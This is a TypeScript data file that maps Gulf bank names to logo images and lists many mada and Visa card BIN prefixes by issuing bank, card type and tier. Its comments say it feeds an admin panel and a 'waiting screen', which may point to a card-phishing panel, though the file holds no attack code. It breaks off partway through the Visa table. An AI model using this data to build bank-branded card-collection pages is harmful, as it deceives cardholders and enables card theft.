// قاعدة بيانات BIN الموحدة
// تستخدم في كل من لوحة الأدمن وشاشة الانتظار
// آخر تحديث: يناير 2026

// خريطة شعارات البنوك
export const BANK_LOGOS: Record<string, string> = {
  // البنوك السعودية
  'الأهلي': '/images/banks/the-saudi-national-bank.png',
  'الراجحي': '/images/banks/al-rajhi-banking-and-investment-corp.png',
  'الإنماء': '/images/banks/alinma-bank.png',
  'الرياض': '/images/banks/riyad-bank.png',
  'البلاد': '/images/banks/al-bilad-bank.png',
  'الفرنسي': '/images/banks/banque-saudi-fransi.png',
  'العربي': '/images/banks/arab-national-bank.png',
  'الجزيرة': '/images/banks/bank-al-jazira.png',
  'الاستثمار': '/images/banks/saudi-investment-bank.png',
  'ساب': '/images/banks/saudi-british-bank.png',
  'الأول': '/images/banks/saudi-awwal-bank.png',
  'الخليج': '/images/banks/gulf-international-bank-bsc.png',
  'الخليج الدولي': '/images/banks/gulf-international-bank-bsc.png',
  // المحافظ الإلكترونية والفنتك
  'STC': '/images/banks/stc-bank.png',
  'STC Pay': '/images/banks/stc-bank.png',
  'برق': '/images/banks/barq.jpg',
  'D360': '/images/banks/d360-bank.png',
  'Tweeq': '/images/banks/tweeq-international-company.webp',
  'Urpay': '/images/banks/urpay.jpg',
  'Vision Bank': '/images/banks/vision-bank.webp',
  'تساهيل': '/images/banks/nayifat-finance-company.png',
  'نايفات': '/images/banks/nayifat-finance-company.png',
  // بنوك أجنبية
  'Emirates NBD': '/images/banks/emirates-nbd-bank-pjsc.png',
  'FAB': '/images/banks/first-abu-dhabi-bank-pjsc.png',
  // البنوك البحرينية
  'NBB': '/images/banks/nbb.png',
  'بنك البحرين الوطني': '/images/banks/nbb.png',
  'BBK': '/images/banks/bbk.png',
  'بنك البحرين والكويت': '/images/banks/bbk.png',
  'AUB Bahrain': '/images/banks/aub-bahrain.jpg',
  'البنك الأهلي المتحد': '/images/banks/aub-bahrain.jpg',
  'Al Salam Bank': '/images/banks/al-salam-bank.jpg',
  'بنك السلام': '/images/banks/al-salam-bank.jpg',
  'BisB': '/images/banks/bisb.jpg',
  'بنك البحرين الإسلامي': '/images/banks/bisb.jpg',
  'Ithmaar Bank': '/images/banks/ithmaar-bank.jpg',
  'بنك الإثمار': '/images/banks/ithmaar-bank.jpg',
  'KFH Bahrain': '/images/banks/kfh-bahrain.jpg',
  'بيت التمويل الكويتي البحرين': '/images/banks/kfh-bahrain.jpg',
  'KHCB': '/images/banks/khcb.png',
  'المصرف الخليجي التجاري': '/images/banks/khcb.png',
  'Citibank Bahrain': '/images/banks/citibank.png',
  'سيتي بنك البحرين': '/images/banks/citibank.png',
  'HSBC Bahrain': '/images/banks/hsbc.png',
  'إتش إس بي سي البحرين': '/images/banks/hsbc.png',
  'Standard Chartered Bahrain': '/images/banks/standard-chartered.png',
  'ستاندرد تشارترد البحرين': '/images/banks/standard-chartered.png',
  'Arab Bank Bahrain': '/images/banks/arab-bank.png',
  'البنك العربي البحرين': '/images/banks/arab-bank.png',
  'GIB Bahrain': '/images/banks/gulf-international-bank-bsc.png',
  'بنك الخليج الدولي البحرين': '/images/banks/gulf-international-bank-bsc.png',
  'ila Bank': '/images/banks/ila-bank.jpeg',
  'إيلا بنك': '/images/banks/ila-bank.jpeg',
  'Al Baraka Bank': '/images/banks/al-baraka-bank.jpg',
  'بنك البركة الإسلامي': '/images/banks/al-baraka-bank.jpg',
  'CrediMax': '/images/banks/credimax.jpg',
  'كريدي ماكس': '/images/banks/credimax.jpg',
  'BMI Bank': '/images/banks/bmi-bank.png',
  'Future Bank': '/images/banks/future-bank.jpg',
  'بنك المستقبل': '/images/banks/future-bank.jpg',
  'Habib Bank': '/images/banks/default.png',
  'ICICI Bank Bahrain': '/images/banks/default.png',
  'Mashreq Bank Bahrain': '/images/banks/default.png',
  'NBK Bahrain': '/images/banks/nbk.png',
  'Arab Financial Services': '/images/banks/default.png',
  'Batelco Financial': '/images/banks/default.png',
  'SBI Bahrain': '/images/banks/default.png',
  'United Bank Bahrain': '/images/banks/default.png',
  'Credit Libanais': '/images/banks/default.png',
  'Housing Bank Bahrain': '/images/banks/default.png',
  'BCFC': '/images/banks/default.png',
  'AMEX Middle East': '/images/banks/default.png',
  'NBAD Bahrain': '/images/banks/default.png',
  'BankMuscat Bahrain': '/images/banks/default.png',
  'Emirates NBD Bahrain': '/images/banks/emirates-nbd-bank-pjsc.png',
  'Network International': '/images/banks/default.png',
  'Universal Financing': '/images/banks/default.png',
  'Cards Financial Services': '/images/banks/default.png',
  'Faysal Islamic Bank': '/images/banks/default.png',
  'Yorkshire Bank': '/images/banks/default.png',
  // البنوك الكويتية
  'NBK': '/images/banks/nbk.png',
  'KFH': '/images/banks/kfh.png',
  'Boubyan': '/images/banks/boubyan.png',
  'Burgan': '/images/banks/burgan.png',
  'Gulf Bank': '/images/banks/gulf-bank.png',
  'CBK': '/images/banks/cbk.png',
  'ABK': '/images/banks/abk.png',
  'KIB': '/images/banks/kib.png',
  'Warba': '/images/banks/warba.png',
  'AUB': '/images/banks/aub.png',
  'QNB Kuwait': '/images/banks/qnb.png',
  'UNB': '/images/banks/unb.png',
  'Doha Bank': '/images/banks/doha-bank.png',
  'Al Rajhi Kuwait': '/images/banks/al-rajhi-kuwait.png',
  'BKME': '/images/banks/bkme.png',
};

// شعارات أنواع البطاقات
export const CARD_TYPE_LOGOS: Record<string, string> = {
  'Visa': '/images/visa.png',
  'Mastercard': '/images/mastercard.png',
  'mada': '/images/mada.png',
  'KNET': '/kpay/knet.png',
};

export interface BinInfo {
  bank: string;
  network: 'Visa' | 'Mastercard' | 'mada' | 'KNET';
  type: string;
  tier: string;
}

// ==================== بطاقات مدى ====================
export const MADA_BINS: Record<string, BinInfo> = {
  '486094': { bank: 'الأهلي', network: 'mada', type: 'Debit', tier: 'Gold' },
  '486095': { bank: 'الأهلي', network: 'mada', type: 'Debit', tier: 'Platinum' },
  '486096': { bank: 'الأهلي', network: 'mada', type: 'Debit', tier: 'Infinite' },
  '515079': { bank: 'الأهلي', network: 'mada', type: 'Debit', tier: 'Standard' },
  '516138': { bank: 'الأهلي', network: 'mada', type: 'Debit', tier: 'Standard' },
  '521076': { bank: 'الأهلي', network: 'mada', type: 'Debit', tier: 'Standard' },
  '524130': { bank: 'الأهلي', network: 'mada', type: 'Debit', tier: 'World Flex' },
  '529415': { bank: 'الأهلي', network: 'mada', type: 'Debit', tier: 'Standard' },
  '535825': { bank: 'الأهلي', network: 'mada', type: 'Debit', tier: 'Titanium' },
  '543085': { bank: 'الأهلي', network: 'mada', type: 'Debit', tier: 'Platinum' },
  '549760': { bank: 'الأهلي', network: 'mada', type: 'Debit', tier: 'Prepaid' },
  '554180': { bank: 'الأهلي', network: 'mada', type: 'Debit', tier: 'World Elite' },
  '555610': { bank: 'الأهلي', network: 'mada', type: 'Debit', tier: 'Standard' },
  '403024': { bank: 'الراجحي', network: 'mada', type: 'Debit', tier: 'Classic' },
  '409201': { bank: 'الراجحي', network: 'mada', type: 'Debit', tier: 'Platinum' },
  '410621': { bank: 'الراجحي', network: 'mada', type: 'Debit', tier: 'Business Enhanced' },
  '410683': { bank: 'الراجحي', network: 'mada', type: 'Debit', tier: 'Business Enhanced' },
  '455708': { bank: 'الراجحي', network: 'mada', type: 'Debit', tier: 'Prepaid Classic' },
  '458456': { bank: 'الراجحي', network: 'mada', type: 'Debit', tier: 'Infinite' },
  '462220': { bank: 'الراجحي', network: 'mada', type: 'Debit', tier: 'Signature' },
  '484783': { bank: 'الراجحي', network: 'mada', type: 'Debit', tier: 'Classic' },
  '412565': { bank: 'الإنماء', network: 'mada', type: 'Debit', tier: 'Classic' },
  '428671': { bank: 'الإنماء', network: 'mada', type: 'Debit', tier: 'Gold' },
  '428672': { bank: 'الإنماء', network: 'mada', type: 'Debit', tier: 'Business Enhanced' },
  '428673': { bank: 'الإنماء', network: 'mada', type: 'Debit', tier: 'Infinite' },
  '432328': { bank: 'الإنماء', network: 'mada', type: 'Debit', tier: 'Classic' },
  '434107': { bank: 'الإنماء', network: 'mada', type: 'Debit', tier: 'Prepaid Classic' },
  '446672': { bank: 'الإنماء', network: 'mada', type: 'Debit', tier: 'Signature' },
  '543357': { bank: 'الإنماء', network: 'mada', type: 'Debit', tier: 'Prepaid Business' },
  '513213': { bank: 'الرياض', network: 'mada', type: 'Debit', tier: 'Prepaid' },
  '520058': { bank: 'الرياض', network: 'mada', type: 'Debit', tier: 'Business' },
  '524514': { bank: 'الرياض', network: 'mada', type: 'Debit', tier: 'Platinum' },
  '529741': { bank: 'الرياض', network: 'mada', type: 'Debit', tier: 'Standard' },
  '535989': { bank: 'الرياض', network: 'mada', type: 'Debit', tier: 'World' },
  '536023': { bank: 'الرياض', network: 'mada', type: 'Debit', tier: 'World' },
  '537767': { bank: 'الرياض', network: 'mada', type: 'Debit', tier: 'Titanium' },
  '558563': { bank: 'الرياض', network: 'mada', type: 'Debit', tier: 'Prepaid' },
  '417633': { bank: 'البلاد', network: 'mada', type: 'Debit', tier: 'Electron' },
  '446393': { bank: 'البلاد', network: 'mada', type: 'Debit', tier: 'Signature' },
  '468540': { bank: 'البلاد', network: 'mada', type: 'Debit', tier: 'Classic' },
  '468541': { bank: 'البلاد', network: 'mada', type: 'Debit', tier: 'Classic' },
  '468542': { bank: 'البلاد', network: 'mada', type: 'Debit', tier: 'Infinite' },
  '468543': { bank: 'البلاد', network: 'mada', type: 'Debit', tier: 'Platinum' },
  '421141': { bank: 'الفرنسي', network: 'mada', type: 'Debit', tier: 'Infinite' },
  '440647': { bank: 'الفرنسي', network: 'mada', type: 'Debit', tier: 'Classic' },
  '440795': { bank: 'الفرنسي', network: 'mada', type: 'Debit', tier: 'Business' },
  '446404': { bank: 'الفرنسي', network: 'mada', type: 'Debit', tier: 'Infinite' },
  '457865': { bank: 'الفرنسي', network: 'mada', type: 'Debit', tier: 'Platinum' },
  '457997': { bank: 'الفرنسي', network: 'mada', type: 'Debit', tier: 'Classic' },
  '474491': { bank: 'الفرنسي', network: 'mada', type: 'Debit', tier: 'Prepaid Classic' },
  '455036': { bank: 'العربي', network: 'mada', type: 'Debit', tier: 'Classic' },
  '524940': { bank: 'العربي', network: 'mada', type: 'Debit', tier: 'Prepaid' },
  '440533': { bank: 'الجزيرة', network: 'mada', type: 'Debit', tier: 'Classic' },
  '445564': { bank: 'الجزيرة', network: 'mada', type: 'Debit', tier: 'Infinite' },
  '489318': { bank: 'الجزيرة', network: 'mada', type: 'Debit', tier: 'Rewards' },
  '489319': { bank: 'الجزيرة', network: 'mada', type: 'Debit', tier: 'Platinum' },
  '483010': { bank: 'الاستثمار', network: 'mada', type: 'Debit', tier: 'Classic' },
  '483011': { bank: 'الاستثمار', network: 'mada', type: 'Debit', tier: 'Platinum' },
  '483012': { bank: 'الاستثمار', network: 'mada', type: 'Debit', tier: 'Infinite' },
  '420132': { bank: 'STC Pay', network: 'mada', type: 'Debit', tier: 'Prepaid Classic' },
  '442463': { bank: 'D360', network: 'mada', type: 'Debit', tier: 'Classic' },
};

// ==================== بطاقات Visa ====================
export const VISA_BINS: Record<string, BinInfo> = {
  '412113': { bank: 'الأهلي', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '430258': { bank: 'الأهلي', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '430259': { bank: 'الأهلي', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '430260': { bank: 'الأهلي', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '445303': { bank: 'الأهلي', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '450766': { bank: 'الأهلي', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '455698': { bank: 'الأهلي', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '465154': { bank: 'الأهلي', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '466515': { bank: 'الأهلي', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '473258': { bank: 'الأهلي', network: 'Visa', type: 'Credit', tier: 'Signature Business' },
  '482052': { bank: 'الأهلي', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '483178': { bank: 'الأهلي', network: 'Visa', type: 'Credit', tier: 'Ultra High Net Worth' },
  '485005': { bank: 'الأهلي', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '485042': { bank: 'الأهلي', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '490917': { bank: 'الأهلي', network: 'Visa', type: 'Debit', tier: 'Prepaid Classic' },
  '491610': { bank: 'الأهلي', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '492145': { bank: 'الأهلي', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '493428': { bank: 'الأهلي', network: 'Visa', type: 'Debit', tier: 'Platinum' },
  '400067': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '400861': { bank: 'الراجحي', network: 'Visa', type: 'Debit', tier: 'Classic' },
  '405433': { bank: 'الراجحي', network: 'Visa', type: 'Debit', tier: 'Prepaid Platinum' },
  '405454': { bank: 'الراجحي', network: 'Visa', type: 'Debit', tier: 'Classic' },
  '407226': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Purchasing' },
  '407281': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Purchasing' },
  '407620': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Business' },
  '407654': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Business Enhanced' },
  '409246': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Ultra High Net Worth' },
  '410248': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '410249': { bank: 'الراجحي', network: 'Visa', type: 'Debit', tier: 'Prepaid Business' },
  '414627': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '416634': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '417321': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '417323': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '418346': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '418347': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '419461': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '422689': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '423219': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '426362': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Ultra High Net Worth' },
  '428274': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '429927': { bank: 'الراجحي', network: 'Visa', type: 'Debit', tier: 'Prepaid Platinum' },
  '432159': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '436321': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '441375': { bank: 'الراجحي', network: 'Visa', type: 'Debit', tier: 'Prepaid Purchasing' },
  '443926': { bank: 'الراجحي', network: 'Visa', type: 'Debit', tier: 'Prepaid Purchasing' },
  '444494': { bank: 'الراجحي', network: 'Visa', type: 'Debit', tier: 'Classic' },
  '445309': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '445520': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '445521': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '445522': { bank: 'الراجحي', network: 'Visa', type: 'Debit', tier: 'Prepaid Platinum' },
  '445827': { bank: 'الراجحي', network: 'Visa', type: 'Debit', tier: 'Prepaid Platinum' },
  '446608': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '446609': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '455395': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '455421': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '455430': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '455739': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '455740': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '457553': { bank: 'الراجحي', network: 'Visa', type: 'Debit', tier: 'Prepaid Platinum' },
  '457597': { bank: 'الراجحي', network: 'Visa', type: 'Debit', tier: 'Prepaid Classic' },
  '460120': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '460121': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '460191': { bank: 'الراجحي', network: 'Visa', type: 'Debit', tier: 'Prepaid Classic' },
  '465254': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '465257': { bank: 'الراجحي', network: 'Visa', type: 'Debit', tier: 'Prepaid Platinum' },
  '465259': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '465260': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '467323': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '472019': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Signature Business' },
  '483115': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '484166': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Business Enhanced' },
  '486653': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Purchasing' },
  '490810': { bank: 'الراجحي', network: 'Visa', type: 'Credit', tier: 'Signature Business' },
  '490980': { bank: 'الراجحي', network: 'Visa', type: 'Debit', tier: 'Prepaid Classic' },
  '494329': { bank: 'الراجحي', network: 'Visa', type: 'Debit', tier: 'Business' },
  '404116': { bank: 'الإنماء', network: 'Visa', type: 'Debit', tier: 'Prepaid Purchasing' },
  '407197': { bank: 'الإنماء', network: 'Visa', type: 'Debit', tier: 'Prepaid Corporate' },
  '407395': { bank: 'الإنماء', network: 'Visa', type: 'Debit', tier: 'Prepaid Classic' },
  '425896': { bank: 'الإنماء', network: 'Visa', type: 'Credit', tier: 'Signature Business' },
  '426897': { bank: 'الإنماء', network: 'Visa', type: 'Credit', tier: 'Ultra High Net Worth' },
  '428678': { bank: 'الإنماء', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '428679': { bank: 'الإنماء', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '432326': { bank: 'الإنماء', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '432327': { bank: 'الإنماء', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '433366': { bank: 'الإنماء', network: 'Visa', type: 'Credit', tier: 'Business' },
  '444397': { bank: 'الإنماء', network: 'Visa', type: 'Credit', tier: 'Purchasing' },
  '446673': { bank: 'الإنماء', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '454807': { bank: 'الإنماء', network: 'Visa', type: 'Debit', tier: 'Prepaid Platinum' },
  '457998': { bank: 'الإنماء', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '458270': { bank: 'الإنماء', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '472106': { bank: 'الإنماء', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '483432': { bank: 'الإنماء', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '401560': { bank: 'الرياض', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '406471': { bank: 'الرياض', network: 'Visa', type: 'Debit', tier: 'Prepaid Purchasing' },
  '416041': { bank: 'الرياض', network: 'Visa', type: 'Debit', tier: 'Prepaid Platinum' },
  '416042': { bank: 'الرياض', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '428973': { bank: 'الرياض', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '435700': { bank: 'الرياض', network: 'Visa', type: 'Debit', tier: 'Prepaid Platinum' },
  '448509': { bank: 'الرياض', network: 'Visa', type: 'Credit', tier: 'Purchasing' },
  '451475': { bank: 'الرياض', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '454683': { bank: 'الرياض', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '454684': { bank: 'الرياض', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '457927': { bank: 'الرياض', network: 'Visa', type: 'Debit', tier: 'Prepaid Classic' },
  '465961': { bank: 'الرياض', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '477983': { bank: 'الرياض', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '479090': { bank: 'الرياض', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '400795': { bank: 'البلاد', network: 'Visa', type: 'Credit', tier: 'Signature Business' },
  '401778': { bank: 'البلاد', network: 'Visa', type: 'Debit', tier: 'Classic' },
  '402667': { bank: 'البلاد', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '403872': { bank: 'البلاد', network: 'Visa', type: 'Debit', tier: 'Prepaid Classic' },
  '403991': { bank: 'البلاد', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '403996': { bank: 'البلاد', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '407989': { bank: 'البلاد', network: 'Visa', type: 'Debit', tier: 'Prepaid Classic' },
  '423254': { bank: 'البلاد', network: 'Visa', type: 'Debit', tier: 'Prepaid Classic' },
  '424260': { bank: 'البلاد', network: 'Visa', type: 'Credit', tier: 'Rewards' },
  '424261': { bank: 'البلاد', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '424262': { bank: 'البلاد', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '428334': { bank: 'البلاد', network: 'Visa', type: 'Debit', tier: 'Prepaid Classic' },
  '428335': { bank: 'البلاد', network: 'Visa', type: 'Debit', tier: 'Prepaid Platinum' },
  '433072': { bank: 'البلاد', network: 'Visa', type: 'Debit', tier: 'Prepaid Classic' },
  '433457': { bank: 'البلاد', network: 'Visa', type: 'Credit', tier: 'Ultra High Net Worth' },
  '433952': { bank: 'البلاد', network: 'Visa', type: 'Debit', tier: 'Prepaid Classic' },
  '443946': { bank: 'البلاد', network: 'Visa', type: 'Debit', tier: 'Prepaid Platinum' },
  '445687': { bank: 'البلاد', network: 'Visa', type: 'Debit', tier: 'Prepaid Platinum' },
  '446392': { bank: 'البلاد', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '446422': { bank: 'البلاد', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '457795': { bank: 'البلاد', network: 'Visa', type: 'Debit', tier: 'Prepaid Corporate' },
  '457796': { bank: 'البلاد', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '475078': { bank: 'البلاد', network: 'Visa', type: 'Credit', tier: 'Business Enhanced' },
  '475100': { bank: 'البلاد', network: 'Visa', type: 'Credit', tier: 'Signature Business' },
  '475109': { bank: 'البلاد', network: 'Visa', type: 'Credit', tier: 'Purchasing' },
  '475153': { bank: 'البلاد', network: 'Visa', type: 'Credit', tier: 'Business Enhanced' },
  '481206': { bank: 'البلاد', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '481207': { bank: 'البلاد', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '490745': { bank: 'البلاد', network: 'Visa', type: 'Debit', tier: 'Prepaid Classic' },
  '401812': { bank: 'الفرنسي', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '401883': { bank: 'الفرنسي', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '401884': { bank: 'الفرنسي', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '401978': { bank: 'الفرنسي', network: 'Visa', type: 'Debit', tier: 'Prepaid Classic' },
  '404278': { bank: 'الفرنسي', network: 'Visa', type: 'Credit', tier: 'Signature Business' },
  '404861': { bank: 'الفرنسي', network: 'Visa', type: 'Credit', tier: 'Business Enhanced' },
  '405057': { bank: 'الفرنسي', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '407392': { bank: 'الفرنسي', network: 'Visa', type: 'Debit', tier: 'Business' },
  '407415': { bank: 'الفرنسي', network: 'Visa', type: 'Credit', tier: 'Business Enhanced' },
  '425871': { bank: 'الفرنسي', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '428275': { bank: 'الفرنسي', network: 'Visa', type: 'Credit', tier: 'Rewards' },
  '437974': { bank: 'الفرنسي', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '437975': { bank: 'الفرنسي', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '437976': { bank: 'الفرنسي', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '437977': { bank: 'الفرنسي', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '437978': { bank: 'الفرنسي', network: 'Visa', type: 'Credit', tier: 'Ultra High Net Worth' },
  '437979': { bank: 'الفرنسي', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '444445': { bank: 'الفرنسي', network: 'Visa', type: 'Debit', tier: 'Prepaid Platinum' },
  '454669': { bank: 'الفرنسي', network: 'Visa', type: 'Credit', tier: 'Business Enhanced' },
  '459583': { bank: 'الفرنسي', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '459588': { bank: 'الفرنسي', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '459800': { bank: 'الفرنسي', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '463869': { bank: 'الفرنسي', network: 'Visa', type: 'Debit', tier: 'Infinite' },
  '473899': { bank: 'الفرنسي', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '474827': { bank: 'الفرنسي', network: 'Visa', type: 'Debit', tier: 'Prepaid Platinum' },
  '475558': { bank: 'الفرنسي', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '496655': { bank: 'الفرنسي', network: 'Visa', type: 'Credit', tier: 'Rewards' },
  '404949': { bank: 'العربي', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '405145': { bank: 'العربي', network: 'Visa', type: 'Credit', tier: 'Ultra High Net Worth' },
  '406485': { bank: 'العربي', network: 'Visa', type: 'Debit', tier: 'Prepaid Select' },
  '417346': { bank: 'العربي', network: 'Visa', type: 'Credit', tier: 'Rewards' },
  '417347': { bank: 'العربي', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '418764': { bank: 'العربي', network: 'Visa', type: 'Credit', tier: 'Signature Business' },
  '420177': { bank: 'العربي', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '422862': { bank: 'العربي', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '435240': { bank: 'العربي', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '438772': { bank: 'العربي', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '439370': { bank: 'العربي', network: 'Visa', type: 'Debit', tier: 'Prepaid Platinum' },
  '455017': { bank: 'العربي', network: 'Visa', type: 'Debit', tier: 'Prepaid Platinum' },
  '455020': { bank: 'العربي', network: 'Visa', type: 'Debit', tier: 'Prepaid Platinum' },
  '455035': { bank: 'العربي', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '455037': { bank: 'العربي', network: 'Visa', type: 'Credit', tier: 'Rewards' },
  '455310': { bank: 'العربي', network: 'Visa', type: 'Credit', tier: 'Rewards' },
  '455422': { bank: 'العربي', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '455423': { bank: 'العربي', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '476328': { bank: 'العربي', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '401758': { bank: 'الجزيرة', network: 'Visa', type: 'Debit', tier: 'Prepaid Platinum' },
  '402527': { bank: 'الجزيرة', network: 'Visa', type: 'Credit', tier: 'Business' },
  '402804': { bank: 'الجزيرة', network: 'Visa', type: 'Credit', tier: 'Business' },
  '406487': { bank: 'الجزيرة', network: 'Visa', type: 'Debit', tier: 'Prepaid Classic' },
  '411092': { bank: 'الجزيرة', network: 'Visa', type: 'Credit', tier: 'Rewards' },
  '414090': { bank: 'الجزيرة', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '414841': { bank: 'الجزيرة', network: 'Visa', type: 'Credit', tier: 'Ultra High Net Worth' },
  '421051': { bank: 'الجزيرة', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '428374': { bank: 'الجزيرة', network: 'Visa', type: 'Credit', tier: 'Rewards' },
  '428375': { bank: 'الجزيرة', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '440532': { bank: 'الجزيرة', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '444495': { bank: 'الجزيرة', network: 'Visa', type: 'Debit', tier: 'Platinum' },
  '444496': { bank: 'الجزيرة', network: 'Visa', type: 'Debit', tier: 'Platinum' },
  '446914': { bank: 'الجزيرة', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '454097': { bank: 'الجزيرة', network: 'Visa', type: 'Debit', tier: 'Business' },
  '473825': { bank: 'الجزيرة', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '473826': { bank: 'الجزيرة', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '473827': { bank: 'الجزيرة', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '473828': { bank: 'الجزيرة', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '489317': { bank: 'الجزيرة', network: 'Visa', type: 'Credit', tier: 'Signature Business' },
  '489447': { bank: 'الجزيرة', network: 'Visa', type: 'Debit', tier: 'Prepaid Classic' },
  '415950': { bank: 'الاستثمار', network: 'Visa', type: 'Debit', tier: 'Classic' },
  '440629': { bank: 'الاستثمار', network: 'Visa', type: 'Credit', tier: 'Classic' },
